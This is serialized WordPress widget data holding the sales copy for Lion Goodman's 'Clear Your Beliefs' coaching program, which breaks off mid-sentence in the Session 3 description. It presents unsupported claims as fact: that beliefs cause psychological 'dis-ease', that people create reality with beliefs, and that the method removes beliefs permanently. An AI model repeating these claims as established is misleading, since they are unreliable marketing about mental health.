Back?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:14:"WP_Widget_Text";}}i:6;a:4:{s:5:"title";s:0:"";s:4:"text";s:322:"<div class="parg-text"><p>Hundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:14:"WP_Widget_Text";}}i:7;a:4:{s:5:"title";s:0:"";s:4:"text";s:277:"<div class="parg-text"><p><strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You’re still not taking consistent actions to reach your goals or change your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:14:"WP_Widget_Text";}}i:8;a:4:{s:5:"title";s:16:"Ok I''m convinced";s:4:"text";s:238:"<center><a class="button first" href="http://clearyourbeliefs.com/program/#package">OK, I''M CONVINCED!<br />Take me to the program description,<br />tell me about all the cool bonuses I’ll get,<br />and how much it costs...</a></center>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"1";s:2:"id";s:1:"8";s:5:"class";s:14:"WP_Widget_Text";}}i:9;a:4:{s:5:"title";s:0:"";s:4:"text";s:61:"<div class="parg-title"><h1>\nWhy Does This Happen?</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:1:"9";s:5:"class";s:14:"WP_Widget_Text";}}i:10;a:4:{s:5:"title";s:0:"";s:4:"text";s:833:"<div class="parg-img pull-left"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /><p class="parg-text">Have you heard the myth, “It takes 30 days to change a habit?” It’s not true. Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes much more time and practice.</p><p class="parg-text">Neuroscientists call the brain’s ability to change over time “neuroplasticity.”</p><p class="parg-text">It can take months – or years – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"8";s:4:"cell";s:1:"0";s:2:"id";s:2:"10";s:5:"class";s:14:"WP_Widget_Text";}}i:11;a:4:{s:5:"title";s:0:"";s:4:"text";s:97:"<div class="parg-title"><h1>To Make Real Change, You Have To Get To The Root of Things</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"11";s:5:"class";s:14:"WP_Widget_Text";}}i:12;a:4:{s:5:"title";s:0:"";s:4:"text";s:302:"<div class="parg-text"><p>The best doctors seek the source the source of the dis-ease. They don’t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don’t solve the cause of the problem – where the illness is being generated.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"10";s:4:"cell";s:1:"0";s:2:"id";s:2:"12";s:5:"class";s:14:"WP_Widget_Text";}}i:13;a:4:{s:5:"title";s:0:"";s:4:"text";s:225:"<div class="parg-text"><p>If you don’t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"0";s:2:"id";s:2:"13";s:5:"class";s:14:"WP_Widget_Text";}}i:14;a:3:{s:3:"src";s:74:"http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg";s:4:"href";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"11";s:4:"cell";s:1:"1";s:2:"id";s:2:"14";s:5:"class";s:31:"SiteOrigin_Panels_Widgets_Image";}}i:15;a:4:{s:5:"title";s:0:"";s:4:"text";s:84:"<div class="parg-title"><h1>Beliefs Are The Foundation Of Your Experience</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"15";s:5:"class";s:14:"WP_Widget_Text";}}i:16;a:4:{s:5:"title";s:0:"";s:4:"text";s:515:"<div class="parg-text"><p>Your psychological, emotional, and spiritual dis-ease are caused primarily by your beliefs. We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate through us, and they are at the root of all the habits and patterns in our life. But we’re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"16";s:5:"class";s:14:"WP_Widget_Text";}}i:17;a:4:{s:5:"title";s:0:"";s:4:"text";s:0:"";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"13";s:4:"cell";s:1:"0";s:2:"id";s:2:"17";s:5:"class";s:14:"WP_Widget_Text";}}i:18;a:4:{s:5:"title";s:0:"";s:4:"text";s:1001:"<div class="parg-img"><img width="158" height="118" alt="construction-300x224" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" class=" wp-image-320 alignleft">\n<p class="parg-text text-blue">Beliefs can be seen as the literal foundation of consciousness, upon which our thoughts, feelings, and attitudes are built.</p>\n<p class="parg-text"><strong>We literally <u>create our reality</u> with our beliefs.</strong></p>\n<img width="157" height="114" alt="dilap" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" class=" wp-image-321 alignright">\n<p class="parg-text">If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won’t be able to achieve permanent success.</p>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"14";s:4:"cell";s:1:"0";s:2:"id";s:2:"18";s:5:"class";s:14:"WP_Widget_Text";}}i:19;a:4:{s:5:"title";s:0:"";s:4:"text";s:74:"<div class="parg-title"><h1>Upgrade Your Human Operating System</h1></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"19";s:5:"class";s:14:"WP_Widget_Text";}}i:20;a:4:{s:5:"title";s:0:"";s:4:"text";s:306:"<div class="parg-text"><p>Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – like managing your life.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"20";s:5:"class";s:14:"WP_Widget_Text";}}i:21;a:4:{s:5:"title";s:0:"";s:4:"text";s:224:"<div class="parg-text"><p>Negative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. Do you ever have thoughts like these?</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"15";s:4:"cell";s:1:"0";s:2:"id";s:2:"21";s:5:"class";s:14:"WP_Widget_Text";}}i:22;a:4:{s:5:"title";s:0:"";s:4:"text";s:796:"<div class="icon_box bullets">\n<ul class="two-col">\n<li><strong><em>I’m not enough.</em></strong></li>\n<li><strong><em>I can’t do it.</em></strong></li>\n<li><strong><em>I’m not worthy.</em></strong></li>\n<li><strong><strong><em>I’ll never be like them.</em></strong></strong></li>\n<li><strong><em>I’m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n<li><strong><em>There’s something wrong with me.</em></strong></li>\n<li><strong><em>I’m fundamentally flawed.</em></strong></li>\n<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"16";s:4:"cell";s:1:"0";s:2:"id";s:2:"22";s:5:"class";s:14:"WP_Widget_Text";}}i:23;a:4:{s:5:"title";s:0:"";s:4:"text";s:212:"<div class="parg-text"><p>These beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"17";s:4:"cell";s:1:"0";s:2:"id";s:2:"23";s:5:"class";s:14:"WP_Widget_Text";}}i:24;a:4:{s:5:"title";s:0:"";s:4:"text";s:231:"<div class="parg-text"><p>At the core of every bad feeling you have about yourself, and every limitation you have, there’s a belief operating in the background, like an annoying little machine that you can’t turn off.</p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"18";s:4:"cell";s:1:"0";s:2:"id";s:2:"24";s:5:"class";s:14:"WP_Widget_Text";}}i:25;a:4:{s:5:"title";s:0:"";s:4:"text";s:230:"<div class="parg-text"><p><strong>Here’s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong></p></div>";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:2:"19";s:4:"cell";s:1:"0";s:2:"id";s:2:"25";s:5:"class";s:14:"WP_Widget_Text";}}i:26;a:4:{s:5:"title";s:0:"";s:4:"text";s:61102:"<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;">To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong>\n\n<img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />A shift at the core of the psyche expands out like a pebble’s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong>\n\n&nbsp;\n\n&nbsp;\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.\n\n<em><strong>How you view others </strong></em>is colored by your beliefs about them.\n\n<strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.\n\n<img class=" wp-image-322 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" />Change the lens of your beliefs, and you’ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\n\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\n\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\n\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\n\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\n\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\n<ul class="indented-img-left">\n	<li>Why did I say that?</li>\n	<li>What’s wrong with me?</li>\n	<li>Why didn’t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul>\n<em>\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\n\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\n\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\n\n&nbsp;\n<h1>Here’s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\n\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\n\n&nbsp;\n<h1>Imagine The Life You Desire</h1>\n<strong>Can you imagine this?</strong>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\n\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\n\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\n\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\n\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.\n\nNo technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.\n\nDuring the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\n\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\n\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\n\nIf you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\nDear Explorer:\nAs a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\n\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\n\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\n\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\n\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\n\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\n\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\n\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\n\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\n\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\n\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\n\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\n\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.\n\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\n\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs...\n\nIn gratitude, and with warm wishes for your total success,\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.\n\nIn this first session, you’ll examine your old beliefs, and determine which ones no longer serve you.  It’s time to discard them and clear some space!  You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.\n\nWhat do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It’s time to haul them out, and toss them out! You don’t need them anymore.  If you hear critical inner voices berating you, don’t miss this session.  Rid yourself of those pesky critical voices along with the diapers!\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is “Anything...” you don’t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>“What’s the use?  You’ll fail anyway. You don’t deserve happiness – look at you!”  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get 